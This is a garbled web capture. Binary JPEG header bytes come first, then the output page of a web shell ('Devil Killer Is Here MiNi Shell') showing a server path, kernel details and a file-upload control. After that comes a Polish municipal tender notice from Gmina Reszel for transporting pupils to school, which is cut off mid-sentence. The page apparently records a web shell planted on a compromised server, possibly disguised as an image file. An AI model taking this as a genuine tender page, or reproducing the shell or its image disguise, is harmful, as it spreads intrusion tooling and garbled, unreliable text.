JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240604/0035044801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowożenie uczniów do szkoły i przedszkola w gminie Reszel od 01.09.2024 roku do 30.06.2026 roku z wyłączeniem wakacji szkolnych w formie zakupu biletów miesięcznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RESZEL</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743611</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Reszel</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-440</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@gminareszel.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bipreszel.warmia.mazury.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowożenie uczniów do szkoły i przedszkola w gminie Reszel od 01.09.2024 roku do 30.06.2026 roku z wyłączeniem wakacji szkolnych w formie zakupu biletów miesięcznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63b80219-2192-11ef-a500-1a0072d5d2bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00350448</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00026947/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowożenie uczniów do szkoły i przedszkola w gminie Reszel od 01.09.2024 roku do 30.06.2026 roku z wyłączeniem wakacji szkolnych w formie zakupu biletów miesięcznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-63b80219-2192-11ef-a500-1a0072d5d2bd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne zostały szczegółowo opisane w SWZ przedmiotowego postępowania oraz Regulaminie Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. U<br/>EL 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• Administratorem Pani/Pana danych osobowych jest Burmistrz Reszla, ul. Rynek 24, 11-440 Reszel.<br/>• Inspektorem ochrony danych osobowych w Urzędzie Gminy w Reszlu jest Dorota Brandeburg, tel. 782348222, email:<br/>iod@gminareszel.pl<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek<br/>prawny stosowania sformalizowanych<br/>procedur udzielania zamówień publicznych spoczywający na Zamawiającym;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• Posiada Pan/Pani:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z<br/>prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>może naruszać integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o dzielenie zamówienia;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>• Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska<br/>od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art.<br/>14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TB-ZP.271.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów do szkoły i przedszkola w gminie Reszel od 01.09.2024 roku do 30.06.2026 roku z wyłączeniem wakacji szkolnych w formie zakupu biletów miesięcznych.<br/>Wspólny Słownik Zamówień – CPV (art. 99 ust. 3 Pzp) - kod wiodący 60112000-6<br/>1)	Uczniowie będą dowożeni do:<br/>a)	Szkoły Podstawowej im. Adama Mickiewicza w Reszlu, ul. M .Konopnickiej 2 i B. Chrobrego 5A w Reszlu;<br/>b)	Przedszkola Samorządowego w Reszlu, ul. M .Konopnickiej 2.<br/>2) Opieka nad dowożonymi uczniami w czasie przewozów. <br/>2.	Zamówienie podzielone zostało na 5 części: <br/>Część I – Przewóz uczniów na Trasie nr 1<br/>Zamawiający dopuszcza składanie ofert częściowych. <br/>3.	Zamówienie obejmuje: świadczenie usług przewozu oraz dostawę i sprzedaż biletów miesięcznych na sieć przewozową Wykonawcy zapewniającą dowóz uczniów w dni nauki szkolnej, czyli w dni, kiedy w szkole/w przedszkolu odbywają się zajęcia edukacyjne, wychowawcze, opiekuńcze lub uroczystości szkolne dla uczniów na podstawie biletów miesięcznych nabytych na podstawie art. 5a ustawy z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego w okresie od 1 września 2024 r. do 30 czerwca 2026 r. z wyłączeniem wakacji szkolnych.<br/>4.	Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2024/2025:<br/>Część I – 27.<br/>Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2025/2026:<br/>Część I – 24.<br/><br/>UWAGA!<br/>Ze względu na ograniczoną liczbę znaków pełny opis zawarto w opisie przedmiotu zamówienia, stanowiącym załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7. <br/>Zamówienie, które może być udzielone zgodnie z regulacją zawartą w art. 214 ust. 1 pkt 7 Pzp, będzie polegać na powtórzeniu usług, będących przedmiotem zamówienia, opisanych w niniejszej specyfikacji warunków zamówienia do 50% szacunkowej wartości usług.<br/>1) Zamawiający udzieli zamówienia na usługi podobne w trybie z wolnej ręki poprzez przekazanie wybranemu przez siebie wykonawcy/ lub realizującemu usługi podstawowe, zaproszenie do negocjacji wraz z informacjami niezbędnymi do przeprowadzenia postępowania, w tym projektowane postanowienia umowne stanowiące podstawę negocjacji.<br/>2) W zaproszeniu do negocjacji Zamawiający określi informacje dotyczące przedmiotu zamówienia, warunków jego realizacji i innych niezbędnych parametrów zamówienia.<br/>3) Negocjacje będą prowadzone w formie ustnej, następnie udokumentowane.<br/>4) Zamawiający może żądać złożenia oświadczenia, o którym mowa w art. 125 ust.1 pzp oraz podmiotowych środków dowodowych, składane pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem<br/>osobistym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>2. Za najkorzystniejszą w danej części zamówienia zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria.<br/>3. Punkty będą przyznawane wg następujących zasad: 1% = 1 punkt.<br/>4. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert (dotyczą części I, II,<br/>III, IV, V):<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga kryterium 40%.<br/>5. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów.<br/>Pozostałym Wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie proporcjonalnie mniejsza liczba punktów zgodnie z poniżej przedstawionymi wzorami do obliczenia punktowego:<br/>1) Cena (C) - waga 60%<br/>C=cena najniższa brutto*/cena oferty ocenianej brutto x 100 pkt x 60%<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Oferta z najniższą ceną otrzyma 60 punktów.<br/>b) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>c) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP) – waga 40%:<br/>a) czas podstawienia pojazdu zastępczego do 30 minut od wystąpienia awarii - 40 pkt<br/>b) czas podstawienia pojazdu zastępczego od 31 minut do 50 minut od wystąpienia awarii - 25 pkt<br/>c) czas podstawienia pojazdu zastępczego od 51 minut do 70 minut od wystąpienia awarii - 10 pkt<br/>d) czas podstawienia pojazdu zastępczego od 71 minut do 90 minut od wystąpienia awarii - 0 pkt<br/>Zamawiający zastrzega, że czas podstawienia pojazdu zastępczego nie może być dłuższy niż 90 minut. Czas podstawienia pojazdu zastępczego powinien zostać podany w przedziałach czasowych wskazanych powyżej. W przypadku wstawienia większej ilości minut niż 90 – oferta zostanie odrzucona<br/>na podstawie art. 226 ust. 1 pkt 5 Pzp.<br/>6. Ostateczny ranking ofert wyliczony zostanie według wzoru:<br/>Ok = C + CzP, gdzie:<br/>Ok – ocena końcowa,<br/>C – ilość punktów za cenę,<br/>Czp – ilość punktów za czas podstawienia pojazdu zastępczego.<br/>7. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i niepodlegających odrzuceniu.<br/>8. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą - przedstawi najkorzystniejszy<br/>bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) w terminie związania ofertą określonym w SWZ.<br/>Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>10. W przypadku, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty o takiej samej cenie, takiego samego czasu podstawienia pojazdu zastępczego w razie awarii, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę oraz nowy czas podstawienia. Wykonawcy,<br/>składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach oraz<br/>dłuższego czasu podstawienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów do szkoły i przedszkola w gminie Reszel od 01.09.2024 roku do 30.06.2026 roku z wyłączeniem wakacji szkolnych w formie zakupu biletów miesięcznych.<br/>Wspólny Słownik Zamówień – CPV (art. 99 ust. 3 Pzp) - kod wiodący 60112000-6<br/>1)	Uczniowie będą dowożeni do:<br/>a)	Szkoły Podstawowej im. Adama Mickiewicza w Reszlu, ul. M .Konopnickiej 2 i B. Chrobrego 5A w Reszlu;<br/>b)	Przedszkola Samorządowego w Reszlu, ul. M .Konopnickiej 2.<br/>2) Opieka nad dowożonymi uczniami w czasie przewozów. <br/>2.	Zamówienie podzielone zostało na 5 części: <br/>Część I – Przewóz uczniów na Trasie nr 1<br/>Zamawiający dopuszcza składanie ofert częściowych. <br/>3.	Zamówienie obejmuje: świadczenie usług przewozu oraz dostawę i sprzedaż biletów miesięcznych na sieć przewozową Wykonawcy zapewniającą dowóz uczniów w dni nauki szkolnej, czyli w dni, kiedy w szkole/w przedszkolu odbywają się zajęcia edukacyjne, wychowawcze, opiekuńcze lub uroczystości szkolne dla uczniów na podstawie biletów miesięcznych nabytych na podstawie art. 5a ustawy z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego w okresie od 1 września 2024 r. do 30 czerwca 2026 r. z wyłączeniem wakacji szkolnych.<br/>4.	Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2024/2025:<br/>Część II – 14.<br/>Prognozowana miesięczna liczba uczniów objętych zamówieniem dla poszczególnych części zamówienia wynosi w roku szkolnym 2025/2026:<br/>Część II – 9.<br/><br/>UWAGA!<br/>Ze względu na ograniczoną liczbę znaków pełny opis zawarto w opisie przedmiotu zamówienia, stanowiącym załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 Zamówienie, które może być udzielone zgodnie z regulacją zawartą w art. 214 ust. 1 pkt 7 Pzp, będzie polegać na powtórzeniu usług, będących przedmiotem zamówienia, opisanych w niniejszej specyfikacji warunków zamówienia do 50% szacunkowej wartości usług.<br/>1) Zamawiający udzieli zamówienia na usługi podobne w trybie z wolnej ręki poprzez przekazanie wybranemu przez siebie wykonawcy/ lub realizującemu usługi podstawowe, zaproszenie do negocjacji wraz z informacjami niezbędnymi do przeprowadzenia postępowania, w tym projektowane postanowienia umowne stanowiące podstawę negocjacji.<br/>2) W zaproszeniu do negocjacji Zamawiający określi informacje dotyczące przedmiotu zamówienia, warunków jego realizacji i innych<br/>niezbędnych parametrów zamówienia.<br/>3) Negocjacje będą prowadzone w formie ustnej, następnie udokumentowane.<br/>4) Zamawiający może żądać złożenia oświadczenia, o którym mowa w art. 125 ust.1 pzp oraz podmiotowych środków dowodowych, składane pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem<br/>osobistym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty nie podlegające 